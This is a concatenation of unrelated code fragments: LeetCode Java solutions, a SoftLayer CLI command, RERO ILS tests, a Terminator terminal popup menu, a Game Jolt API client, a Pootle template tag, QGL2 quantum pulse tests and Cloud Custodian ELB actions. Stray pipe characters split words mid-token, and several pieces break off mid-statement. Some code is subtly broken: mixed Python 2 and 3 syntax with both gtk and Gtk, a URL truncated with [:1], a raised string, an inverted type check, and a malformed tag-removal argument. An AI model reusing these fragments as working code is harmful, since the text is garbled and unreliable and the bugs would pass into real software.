    """Minimal sanity-check suite for this reference module."""
    def test_Local(self):
        # Trivial placeholder assertion; always passes.
        self.assertTrue(1 == 1)
if __name__ == '__main__':
    # Run the sanity-check unittest above.
    unittest.main()
Java = '''
Thought: https://leetcode.com/problems/nested-list-weight-sum/solution/
/**
* // This is the interface that allows for creating nested lists.
* // You should not implement it, or speculate about its implementation
* public interface NestedInteger {
*
* // @return true if this NestedInteger holds a single integer, rather than a nested list.
* public boolean isInteger();
*
* // @return the single integer that this NestedInteger holds, if it holds a single integer
* // Return null if this NestedInteger holds a nested list
* public Integer getInteger();
*
* // @return the nested list that this NestedInteger holds, if it holds a nested list
* // Return null if this NestedInteger holds a single integer
* public List<NestedInteger> getList();
* }
*/
1. DFS
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
return dfs(nestedList, 1);
}
public int dfs(List<NestedInteger> nestedList, int depth) {
int sum = 0;
for (NestedInteger e : nestedList) {
sum += e.isInteger() ? e.getInteger() * depth : dfs(e.getList(), depth + 1);
}
return sum;
}
}
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
int sum = 0;
for (NestedInteger ni : nestedList) {
sum += depthSum(ni, 1);
}
return sum;
}
private int depthSum(NestedInteger ni, int depth) {
if (ni.isInteger()) {
return ni.getInteger() * depth;
} else {
int sum = 0;
for (NestedInteger n : ni.getList()) {
sum += depthSum(n, depth + 1);
}
return sum;
}
}
}
2. BFS
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
int sum = 0;
Queue<NestedInteger> queue = new LinkedList<>();
int depth = 1;
for (NestedInteger ni : nestedList) {
queue.add(ni);
}
while (!queue.isEmpty()) {
int size = queue.size();
while (size-- > 0) {
NestedInteger cur = queue.poll();
if (cur.isInteger()) {
sum += cur.getInteger() * depth;
} else {
for (NestedInteger ni : cur.getList()) {
queue.add(ni);
}
}
}
depth++;
}
return sum;
}
}
'''
|
"""Edit the RWhois data on the account."""
# :license: MIT, see LICENSE for more details.
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import exceptions
import click
@click.command()
@click.option('--abuse', help='Set the abuse email address')
@click.option('--address1', help='Update the address 1 field')
@click.option('--address2', help='Update the address 2 field')
@click.option('--city', help='Set the city name')
@click.option('--company', help='Set the company name')
@click.option('--country', help='Set the two-letter country code')
@click.option('--firstname', help='Update the first name field')
@click.option('--lastname', help='Update the last name field')
@click.option('--postal', help='Set the postal code field')
@click.option('--public/--private',
              default=None,
              help='Flags the address as a public or private residence.')
@click.option('--state', help='Set the two-letter state code')
@environment.pass_env
def cli(env, abuse, address1, address2, city, company, country, firstname,
        lastname, postal, public, state):
    """Edit the RWhois data on the account."""
    mgr = SoftLayer.NetworkManager(env.client)
    # --public stores True and --private stores False, while the API wants
    # the inverse flag (private_residence): invert unless left unset.
    update = {
        'abuse_email': abuse,
        'address1': address1,
        'address2': address2,
        'company_name': company,
        'city': city,
        'country': country,
        'first_name': firstname,
        'last_name': lastname,
        'postal_code': postal,
        'state': state,
        'private_residence': None if public is None else not public,
    }
    # Refuse a no-op invocation where every field was omitted.
    if all(value is None for value in update.values()):
        raise exceptions.CLIAbort(
            "You must specify at least one field to update.")
    mgr.edit_rwhois(**update)
|
# -*- coding: utf-8 -*-
#
# RERO IL | S
# Copyright (C) 2019 RERO
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affer | o General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Libraries elasticsearch mapping tests."""
from utils import get_mapping
from rero_ils.modules.locations.api import Location, LocationsSearch
def test_location_es_mapping(es, db, loc_public_martigny_data,
                             lib_martigny, org_martigny):
    """Test library elasticsearch mapping."""
    search = LocationsSearch()
    mapping = get_mapping(search.Meta.index)
    assert mapping
    loc = Location.create(
        loc_public_martigny_data, dbcommit=True, reindex=True, delete_pid=True)
    # Indexing a record must not change the mapping (no dynamic fields).
    new_mapping = get_mapping(search.Meta.index)
    assert mapping == new_mapping
    loc.delete(force=True, dbcommit=True, delindex=True)
def test_location_search_mapping(app, locations_records):
    """Each known location code must match exactly one document."""
    search = LocationsSearch()
    for code in ('MARTIGNY-PUBLIC', 'SAXON-PUBLIC'):
        assert search.query('match', code=code).count() == 1
|
s')
namecopy = _('_Copy VoIP address')
elif url[1] in terminal.matches.values():
# This is a plugin match
for pluginname in terminal.matches:
if terminal.matches[pluginname] == url[1]:
break
dbg("Found match ID (%d) in terminal.matches plugin %s" %
(url[1], pluginname))
registry = plugin.PluginRegistry()
registry.load_plugins()
plugins = registry.get_plugins_by_capability('url_handler')
for urlplugin in plugins:
if urlplugin.handler_name == pluginname:
dbg("Identified matching plugin: %s" %
urlplugin.handler_name)
nameopen = _(urlplugin.nameopen)
namecopy = _(urlplugin.namecopy)
break
if not nameopen:
nameopen = _('_Open link')
if not namecopy:
namecopy = _('_Copy address')
icon = Gtk.Image.new_from_stock(Gtk.STOCK_JUMP_TO,
Gtk.IconSize.MENU)
item = Gtk.ImageMenuItem.new_with_mnemonic(nameopen)
item.set_property('image', icon)
item.connect('activate', lambda x: terminal.open_url(url, True))
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(namecopy)
item.connect('activate',
lambda x: terminal.clipboard.set_text(terminal.prepare_url(url), len(terminal.prepare_url(url))))
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Copy'))
item.connect('activate', lambda x: terminal.vte.copy_clipboard())
item.set_sensitive(terminal.vte.get_has_selection())
menu.append(item)
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Paste'))
item.connect('activate', lambda x: terminal.paste_clipboard())
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if not terminal.is_zoomed():
item = Gtk.ImageMenuItem.new_with_mnemonic(_('Split H_orizontally'))
image = Gtk.Image()
image.set_from_icon_name(APP_NAME + '_horiz', Gtk.IconSize.MENU)
item.set_image(image)
if hasattr(item, 'set_always_show_image'):
item.set_always_show_image(True)
item.connect('activate', lambda x: terminal.emit('split-horiz',
self.terminal.get_cwd()))
menu.append(item)
item = Gtk.ImageMenuItem.new_with_mnemonic(_('Split V_ertically'))
image = Gtk.Image()
image.set_from_icon_name(APP_NAME + '_vert', Gtk.IconSize.MENU)
item.set_image(image)
if hasattr(item, 'set_always_show_image'):
item.set_always_show_image(True)
item.connect('activate', lambda x: terminal.emit('split-vert',
self.terminal.get_cwd()))
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(_('Open _Tab'))
item.connect('activate', lambda x: terminal.emit('tab-new', False,
terminal))
menu.append(item)
if self.terminator.debug_address is not None:
item = Gtk.MenuItem.new_with_mnemonic(_('Open _Debug Tab'))
item.connect('activate', lambda x:
terminal.emit('tab-new', True, terminal))
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Close'))
item.connect('activate', lambda x: terminal.close())
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if not terminal.is_zoomed():
sensitive = not terminal.get_toplevel() == terminal.get_parent()
item = Gtk.MenuItem.new_with_mnemonic(_('_Zoom terminal'))
item.connect('activate', terminal.zoom)
item.set_sensitive(sensitive)
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(_('Ma_ximize terminal'))
item.connect('activate', terminal.maximise)
item.set_sensitive(sensitive)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
else:
item = Gtk.MenuItem.new_with_mnemonic(_('_Restore all terminals'))
item.connect('activate', terminal.unzoom)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if self.config['show_titlebar'] == False:
item = Gtk.MenuItem.new_with_mnemonic(_('Grouping'))
submenu = self.terminal.populate_group_menu()
submenu.show_all()
item.set_submenu(submenu)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.CheckMenuItem.new_with_mnemonic(_('Show _scrollbar'))
item.set_active(terminal.scrollbar.get_property('visible'))
item.connect('toggled', lambda x: terminal.do_scrollbar_toggle())
menu.append(item)
item = gtk.CheckMenuItem(_('Toggle tab visibility'))
item.set_active(terminal.scrollbar.get_property('visible'))
item.connect('toggled', self.toggle_tab_visibility)
menu.append(item)
if hasattr(Gtk, 'Builder'): # VERIFY FOR GTK3: is this ever false?
item = Gtk.MenuItem.new_with_mnemonic(_('_Preferences'))
item.connect('activate', lambda x: PrefsEditor(self.terminal))
menu.append(item)
profilelist = sorted(self.config.list_profiles(), key=string.lower)
if len(profilelist) > 1:
item = Gtk.MenuItem.new_with_mnemonic(_('Profiles'))
submenu = Gtk.Menu()
item.set_submenu(submenu)
menu.append(item)
current = terminal.get_profile()
group = None
for profile in profilelist:
profile_label = profile
if profile_label == 'default':
profile_label = profile.capitalize()
item = Gtk.RadioMenuItem(profile_label, group)
if profile == current:
item.set_active(True)
item.connect('activate', terminal.force_set_profile, profile)
submenu.append(item)
self.add_encoding_items(menu)
try:
menuitems = []
registry = plugin.PluginRegistry()
registry.load_plugins()
plugins = registry.get_plugins_by_capability('terminal_menu')
for menuplugin in plugins:
menuplugin.callback(menuitems, menu, terminal)
if len(menuitems) > 0:
menu.append(Gtk.SeparatorMenuItem())
for menuitem in menuitems:
menu.append(menuitem)
except Exception, ex:
err('TerminalPopupMenu::show: %s' % ex)
menu.show_all()
menu.popup(None, None, None, None, button, time)
return(True)
def toggle_tab_visibility(self, widget):
"""tab visibility"""
status = self.config['tab_position']
old_tab_position = self.config['old_tab_position']
if status == 'hidden':
if old_tab_position:
#if there's no oldstatus, hidden is default option
self.config['tab_position'] = old_tab_position
self.config.save()
else:
self.config['old_tab_position'] = status
self.config['tab_position' | ] = 'hidden'
self.config.save()
terminator = Terminator()
terminator.reconfigure()
def add_encoding_items(self, menu):
"""Add the encoding list to the menu"""
terminal = self.t | erminal
active_encodings = terminal.config['active_encodings']
item = Gtk.MenuItem.new_with_mnemonic(_("Encodings"))
menu.append (item)
submenu = Gtk.Menu ()
item.set_submenu (s |
WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/lgpl.txt>.
import sys
import hashlib
import json
if sys.hexversion > 0x03000000:
try:
import urllib.request
except:
raise ImportError
else:
try:
import urllib
except:
raise ImportError
class GameJoltTrophy(object):
"""
The Class constructors.
The class requires four essential parameters: user name, user token, game ID
and private code. Check the API documentation on Game Jolt's website to see
what those parameters they are. In this code, I used the same names on the
site. If you read it, you can understand what's going on here.
Note that *username* and *user token* can be changed later, but the game id
and the private key must be defined first, as they won't change.
"""
def __ini | t__(self, username, user_token, game_id, private_key):
super(GameJoltTrophy, self).__init__()
self.username = username
self.user_token = user_token
self.game_id = game_id
self.private_key = private_key
self.URL = 'http://gamejolt.com/api/game/v1'
self.nativeTraceback = False
#====== TOOLS ======#
# Used for changing users, setting and/or fixing authentications
def changeUsername(self, username):
"""
Changes the *username* contained on the object
Used for changing, setting and/or | fixing authentications
"""
self.username = username
#
def changeUserToken(self, user_token):
"""
Changes the *user token* contained on the object
Used for changing, setting and/or fixing authentications
"""
self.user_token = user_token
def setSignatureAndgetJSONResponse(self, URL):
"""
Generates a signature from the url and returns the same address, with the
signature added to it.
All singatures are generated with md5, but can be modified below.
This is the only function that generates the signature, so changing the
encoding to SHA1 or other format will affect all URL requests.
"""
if sys.hexversion > 0x03000000:
try:
link = URL + str(self.private_key)
link = link.encode('ascii')
signature = hashlib.md5(link).hexdigest()
URL += '&'+'signature='+str(signature)
response = urllib.request.urlopen(URL)
output = response.read().decode('utf8')
return json.loads(output)['response']
except Exception as error:
if not self.nativeTraceback:
return {'success': 'false', 'message': str(error)}
else:
raise error
else:
try:
link = URL + str(self.private_key)
link = link.encode('ascii')
signature = hashlib.md5(link).hexdigest()
URL += '&'+'signature='+str(signature)
response = urllib.urlopen(URL)
output = response.read().decode('utf8')
return json.loads(output)['response']
except Exception as error:
if not self.nativeTraceback:
return {'success': 'false', 'message': str(error)}
else:
raise error
def setNativeTraceback(self, value):
if not type(value) == bool: self.nativeTraceback = value
else: raise TypeError
#====== USERS ======#
def fetchUserInfo(self):
"""
Fetches the infos of a user as a dictionary type.
**ATTENTION**: it returns a dictionary type value with the key *users*,
containing the user being fetched.
Right now it only fetches the user stored in the object, but can retrive a
list of users. This is not available now, will be implemented later.
"""
URL = self.URL+'/users/?format=json&game_id='+str(self.game_id)+'&'+'username='+str(self.username)
return self.setSignatureAndgetJSONResponse(URL)
def authenticateUser(self):
"""
Authenticate a user defined in the object variable.
The purpose of this method is to check if the user's credential
(name and token) are valid. Then, you're safe to call the other methods
Return a boolean type value.
"""
URL = self.URL+'/users/auth/?format=json&game_id='+str(self.game_id)+'&'+'username='+str(self.username)+\
'&'+'user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
#====== TROPHIES ======#
def fetchTrophy(self, achieved=None, trophy=None):
"""
The 'trophy' argument receives a list of one or more ID of trophies to be
returned. It ignores the 'achieved' argument, so pass a 'None' value to it.
where you pass the desired number between the braces, separating each trophy
ID with commas.
If 'achieved' is:
> set to True, only the achieved trophies will be returned
> set to False, only trophies that the user hasn't achieved yet will be
returned
> set to None (no argument is passed), then all trophies will be retrieved
"""
URL = self.URL+'/trophies/?format=json&'+\
'game_id='+str(self.game_id)+'&'+'username='+str(self.username)+'&'+'user_token='+str(self.user_token)
if achieved != None:
URL += '&achieved='
if achieved == True: URL += 'true'
if achieved == False: URL += 'false'
else:
if trophy != None:
if type(trophy) == int:
URL += '&trophy_id='+str(trophy)+'&'
elif type(trophy) == list:
miniurl = '&trophy_id='
for t in trophy:
miniurl += str(t)+','
miniurl = miniurl[:1]
URL += miniurl
else:
raise 'Invalid type for trophy: must be int or list.'
return self.setSignatureAndgetJSONResponse(URL)
def addAchieved(self, trophy_id):
"""
Sets a winning trophy for the user.
If the parameters are valid, returns True. Otherwise, it returns False.
"""
URL = self.URL+'/trophies/add-achieved/?'+\
'game_id='+str(self.game_id)+'&'+'user_token='+str(self.user_token)+'&'+'username='+str(self.username)+\
'&'+'trophy_id='+str(trophy_id)
try:
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
except Exception as error:
return {'success': 'false', 'message': str(error)}
#====== SCORES ======#
def fetchScores(self, limit=10, table_id=None, user_info_only=False):
"""
The *limit* argument is set to 10 by default, but can't be more than 100. If
you pass a higher number, the method will automatically set to the maximum
size.
*table_id* if for returning scores for a specific table. If no arguments are
passed (None), it will return all the tables avaliable.
If *user_info_only* is set to True, only scores for the player stored on the
object will be returned.
"""
URL = self.URL+'/scores/?format=json&game_id='+str(self.game_id)
if user_info_only:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
# ID of the score table
if table_id:
URL += '&table_id='+str(table_id)
# Maximum number of scores should be 100 according with the GJAPI
if limit > 100:
limit = 100
URL += '&limit='+str(limit)
return self.setSignatureAndgetJSONResponse(URL)
def addScores(self, score, sort, table_id=None, extra_data='', guest=False, guestname=''):
"""
This method adds a score to the player or guest.
*score* is a string value describing the score value.
*sort* is the actual score value, a number value. But can be a string too.
For *table_id*, check the fetchScores method.
*extra_data* is a string value with any data you would like to store. It
doesn't appear on the site.
If you want to store a score for a guest instead of the user, you:
> set True to 'guest' parameter.
> set a string value with the name of the guest on 'guestname'
"""
URL = self.URL+'/scores/add/?format=json&game_id='+str(self.game_id)+\
'&score='+str(score)+'&sort='+str(sort)
if not guest:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
else:
URL += '&guest='+str(guestname)
if extra_data:
URL += '&extra_data='+extra_data
if table_id:
URL += '&table_id='+str(table_id)
return self.setSignatureAndgetJSONResponse(URL)
def scoreTable(self):
""" Returns the tables containing the high scores for the game."""
URL = self.URL+'/scores/tables/?format=json&game_id='+str(self.game_id)
return self.setSignatureAndgetJSONResponse(URL)
#====== SESSIONS ======#
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009, 2013 Zuza Software Foundation
#
# This file is part of Pootle.
#
# Pootle is free software; you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# Pootle is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public Lic | ense along with
# Pootle; if not, see <http://www.gnu.org/licenses/>.
from django import template
re | gister = template.Library()
@register.inclusion_tag('terminology/term_edit.html', takes_context=True)
def render_term_edit(context, form):
    """Render the terminology edit form with its language context."""
    return {
        'unit': form.instance,
        'form': form,
        'language': context['language'],
        'source_language': context['source_language'],
    }
|
# Transform the returned sequences into the canonical form for comparing
# to the explicit QGL1 version above.
# EG, 'flatten' any embedded lists of sequences.
seqs = testable_sequence(seqs)
# Assert that the QGL1 is the same as the generated QGL2
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
# Tests list of lists of function references, instead of sub-functions
def test_AllXY_alt1(self):
q1 = QubitFactory('q1')
qr = QRegister('q1')
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
resFunction = compile_function(
"test/code/AllXY_alt.py",
"doAllXY",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
def test_AllXY_alt2(self):
q1 = QubitFactory('q1')
qr = QRegister('q1')
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
resFunction = compile_function(
"test/code/AllXY_alt.py",
"doAllXY2",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
# BlankingSweeps are OBE, so not tested
class TestCR(unittest.TestCase):
    """Cross-resonance (two-qubit) sequences: the QGL2-compiled output must
    equal the hand-built QGL1 pulse sequences constructed here."""

    def setUp(self):
        # Reset the channel library before every test.
        channel_setup()

    def test_PiRabi(self):
        """PiRabi: flat-top gaussian on the q1-q2 edge, once with and once
        without X pulses on the control, plus 2-qubit calibrations."""
        controlQ = QubitFactory('q1')
        targetQ = QubitFactory('q2')
        controlQR = QRegister(controlQ)
        targetQR = QRegister(targetQ)
        edge = EdgeFactory(controlQ, targetQ)
        lengths = np.linspace(0, 4e-6, 11)
        riseFall=40e-9
        amp=1
        phase=0
        calRepeats = 2
        expected_seq = []
        # Seq1
        for l in lengths:
            expected_seq += [
                qwait(channels=(controlQ, targetQ)),
                Id(controlQ),
                flat_top_gaussian(edge, riseFall, length=l, amp=amp, phase=phase),
                Barrier(controlQ, targetQ),
                MEAS(controlQ),
                MEAS(targetQ)
            ]
        # Seq2
        for l in lengths:
            expected_seq += [
                qwait(channels=(controlQ, targetQ)),
                X(controlQ),
                flat_top_gaussian(edge, riseFall, length=l, amp=amp, phase=phase),
                X(controlQ),
                Barrier(controlQ, targetQ),
                MEAS(controlQ),
                MEAS(targetQ)
            ]
        # Add calibration
        calseq = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
        expected_seq += calseq
        expected_seq = testable_sequence(expected_seq)
        resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
                "PiRabi", (controlQR, targetQR, lengths, riseFall, amp, phase, calRepeats))
        seqs = resFunction()
        seqs = testable_sequence(seqs)
        # Show full diffs when the sequences differ.
        self.maxDiff = None
        assertPulseSequenceEqual(self, seqs, expected_seq)

    def test_EchoCRLen(self):
        """EchoCRLen: echoed CR of varying length, framed by Id (Seq1) or
        X (Seq2) pulses on the control qubit."""
        controlQ = QubitFactory('q1')
        targetQ = QubitFactory('q2')
        cR = QRegister('q1')  # Equivalent to QRegister(controlQ)
        tR = QRegister('q2')
        # FIXME: Better values!?
        lengths = np.linspace(0, 2e-6, 11)
        riseFall=40e-9
        amp=1
        phase=0
        calRepeats=2
        canc_amp=0
        canc_phase=np.pi/2
        expected_seq = []
        # Seq1
        for l in lengths:
            expected_seq += [
                qwait(channels=(controlQ, targetQ)),
                Id(controlQ),
                echoCR(controlQ, targetQ, length=l, phase=phase, amp=amp,
                       riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
                Id(controlQ),
                Barrier(controlQ, targetQ),
                MEAS(controlQ),
                MEAS(targetQ)
            ]
        # Seq2
        for l in lengths:
            expected_seq += [
                qwait(channels=(controlQ, targetQ)),
                X(controlQ),
                echoCR(controlQ, targetQ, length=l, phase=phase, amp=amp,
                       riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
                X(controlQ),
                Barrier(controlQ, targetQ),
                MEAS(controlQ),
                MEAS(targetQ)
            ]
        # Add calibration
        cal_seqs = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
        expected_seq += cal_seqs
        expected_seq = testable_sequence(expected_seq)
        resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
                "EchoCRLen",
                (cR, tR, lengths, riseFall, amp, phase, calRepeats, canc_amp, canc_phase) )
        seqs = resFunction()
        seqs = testable_sequence(seqs)
        self.maxDiff = None
        assertPulseSequenceEqual(self, seqs, expected_seq)

    def test_EchoCRPhase(self):
        """EchoCRPhase: echoed CR of varying phase at a fixed length, with
        a trailing X90 on the target qubit."""
        controlQ = QubitFactory('q1')
        targetQ = QubitFactory('q2')
        cR = QRegister('q1')
        tR = QRegister('q2')
        phases = np.linspace(0, pi/2, 11)
        riseFall=40e-9
        amp=1
        length=100e-9
        calRepeats=2
        canc_amp=0
        canc_phase=np.pi/2
        expected_seq = []
        # Seq1
        for p in phases:
            expected_seq += [
                qwait(channels=(controlQ, targetQ)),
                Id(controlQ),
                echoCR(controlQ, targetQ, length=length, phase=p, amp=amp,
                       riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
                Barrier(controlQ, targetQ),
                X90(targetQ),
                Id(controlQ),
                Barrier(controlQ, targetQ),
                MEAS(controlQ),
                MEAS(targetQ)
            ]
        # Seq2
        for p in phases:
            expected_seq += [
                qwait(channels=(controlQ, targetQ)),
                X(controlQ),
                echoCR(controlQ, targetQ, length=length, phase=p, amp=amp,
                       riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
                Barrier(controlQ, targetQ),
                X90(targetQ),
                X(controlQ),
                Barrier(controlQ, targetQ),
                MEAS(controlQ),
                MEAS(targetQ)
            ]
        # Add calibration
        cal_seqs = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
        expected_seq += cal_seqs
        expected_seq = testable_sequence(expected_seq)
        resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
                "EchoCRPhase",
                (cR, tR, phases, riseFall, amp, length, calRepeats, canc_amp, canc_phase))
        seqs = resFunction()
        seqs = testable_sequence(seqs)
        self.maxDiff = None
        assertPulseSequenceEqual(self, seqs, expected_seq)
class TestDecoupling(unittest.TestCase):
def setUp(self):
channel_setup()
def test_HahnEcho(self):
q = QubitFactory('q1')
qr = QRegister('q1')
steps = 11
pulseSpacings = np.linspace(0, 5e-6, steps)
periods = 0
calRepeats=2
expectedseq = []
for k in range(len(pulseSpacings)):
expectedseq += [
qwait(channels=(q,)),
|
Key": present
actions:
- type: remove-tag
tags: [OldTagKey1, OldTagKey2]
"""
batch_size = 1
permissions = ('elasticloadbalancing:RemoveTags',)
def process_resource_set(self, resource_set, tag_keys):
client = local_session(
self.manager.session_factory).client('elb')
client.remove_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=[{'Key': k for k in tag_keys}])
@actions.register('delete')
class Delete(BaseAction):
    """Action to delete ELB(s)

    It is recommended to apply a filter to the delete policy to avoid
    unwanted deletion of any load balancers.

    :example:

    .. code-block:: yaml

            policies:
              - name: elb-delete-unused
                resource: elb
                filters:
                  - Instances: []
                actions:
                  - delete
    """

    schema = type_schema('delete')
    permissions = ('elasticloadbalancing:DeleteLoadBalancer',)

    def process(self, load_balancers):
        # Fan the deletions out over a small thread pool; list() drains
        # the lazy map so every delete actually executes.
        with self.executor_factory(max_workers=2) as w:
            list(w.map(self.process_elb, load_balancers))

    def process_elb(self, elb):
        # Delete a single load balancer, using the manager's retry
        # wrapper to absorb API throttling.
        client = local_session(self.manager.session_factory).client('elb')
        self.manager.retry(
            client.delete_load_balancer,
            LoadBalancerName=elb['LoadBalancerName'])
@actions.register('set-ssl-listener-policy')
class SetSslListenerPolicy(BaseAction):
    """Action to set the ELB SSL listener policy

    :example:

    .. code-block:: yaml

            policies:
              - name: elb-set-listener-policy
                resource: elb
                actions:
                  - type: set-ssl-listener-policy
                    name: SSLNegotiation-Policy-01
                    attributes:
                      - Protocol-SSLv3
                      - Protocol-TLSv1.1
                      - DHE-RSA-AES256-SHA256
    """

    schema = type_schema(
        'set-ssl-listener-policy',
        name={'type': 'string'},
        attributes={'type': 'array', 'items': {'type': 'string'}},
        required=['name', 'attributes'])
    permissions = (
        'elasticloadbalancing:CreateLoadBalancerPolicy',
        'elasticloadbalancing:SetLoadBalancerPoliciesOfListener')

    def process(self, load_balancers):
        with self.executor_factory(max_workers=3) as w:
            list(w.map(self.process_elb, load_balancers))

    @worker
    def process_elb(self, elb):
        # Nothing to do for load balancers without SSL/HTTPS listeners.
        if not is_ssl(elb):
            return
        client = local_session(self.manager.session_factory).client('elb')
        # Create a custom policy with epoch timestamp.
        # to make it unique within the
        # set of policies for this load balancer.
        # NOTE(review): strftime("%s") is a platform-specific (glibc)
        # extension, not standard strftime -- confirm it works on all
        # deployment platforms.
        policy_name = self.data.get('name') + '-' + \
            str(int(datetime.now(tz=tzutc()).strftime("%s")) * 1000)
        lb_name = elb['LoadBalancerName']
        attrs = self.data.get('attributes')
        policy_attributes = [{'AttributeName': attr, 'AttributeValue': 'true'}
            for attr in attrs]
        try:
            client.create_load_balancer_policy(
                LoadBalancerName=lb_name,
                PolicyName=policy_name,
                PolicyTypeName='SSLNegotiationPolicyType',
                PolicyAttributes=policy_attributes)
        except ClientError as e:
            # Idempotence: an identically named policy may already exist;
            # anything else is a real failure and is re-raised.
            if e.response['Error']['Code'] not in (
                    'DuplicatePolicyName', 'DuplicatePolicyNameException',
                    'DuplicationPolicyNameException'):
                raise
        # Apply it to all SSL listeners.
        ssl_policies = ()
        if 'c7n.ssl-policies' in elb:
            ssl_policies = elb['c7n.ssl-policies']
        for ld in elb['ListenerDescriptions']:
            if ld['Listener']['Protocol'] in ('HTTPS', 'SSL'):
                policy_names = [policy_name]
                # Preserve extant non-ssl listener policies
                policy_names.extend(ld.get('PolicyNames', ()))
                # Remove extant ssl listener policy
                if ssl_policies:
                    policy_names = list(set(policy_names).difference(ssl_policies))
                client.set_load_balancer_policies_of_listener(
                    LoadBalancerName=lb_name,
                    LoadBalancerPort=ld['Listener']['LoadBalancerPort'],
                    PolicyNames=policy_names)
@actions.register('modify-security-groups')
class ELBModifyVpcSecurityGroups(ModifyVpcSecurityGroupsAction):
    """Modify VPC security groups on an ELB."""

    permissions = ('elasticloadbalancing:ApplySecurityGroupsToLoadBalancer',)

    def process(self, load_balancers):
        client = local_session(self.manager.session_factory).client('elb')
        # Resolve the target security-group set for every balancer first.
        groups = super(ELBModifyVpcSecurityGroups, self).get_groups(
            load_balancers, 'SecurityGroups')
        for balancer, target_groups in zip(load_balancers, groups):
            client.apply_security_groups_to_load_balancer(
                LoadBalancerName=balancer['LoadBalancerName'],
                SecurityGroups=target_groups)
@actions.register('enable-s3-logging')
class EnableS3Logging(BaseAction):
    """Turn on S3 access logging for Elastic Load Balancers.

    :example:

    .. code-block:: yaml

            policies:
              - name: elb-test
                resource: app-elb
                filters:
                  - type: is-not-logging
                actions:
                  - type: enable-s3-logging
                    bucket: elblogtest
                    prefix: dahlogs
                    emit_interval: 5
    """
    schema = type_schema('enable-s3-logging',
        bucket={'type': 'string'},
        prefix={'type': 'string'},
        emit_interval={'type': 'integer'},
    )
    permissions = ("elasticloadbalancing:ModifyLoadBalancerAttributes",)

    def process(self, resources):
        client = local_session(self.manager.session_factory).client('elb')
        # Map optional policy keys onto the AccessLog attribute names.
        attr_map = (('bucket', 'S3BucketName'),
                    ('prefix', 'S3BucketPrefix'),
                    ('emit_interval', 'EmitInterval'))
        for elb in resources:
            log_attrs = {'Enabled': True}
            for key, attr in attr_map:
                if key in self.data:
                    log_attrs[attr] = self.data[key]
            client.modify_load_balancer_attributes(
                LoadBalancerName=elb['LoadBalancerName'],
                LoadBalancerAttributes={'AccessLog': log_attrs})
        return resources
@actions.register('disable-s3-logging')
class DisableS3Logging(BaseAction):
    """Turn off S3 access logging for ElasticLoadBalancers.

    :example:

    .. code-block:: yaml

            policies:
              - name: turn-off-elb-logs
                resource: elb
                filters:
                  - type: is-logging
                    bucket: prodbucket
                actions:
                  - type: disable-elb-logging
    """
    schema = type_schema('disable-s3-logging')
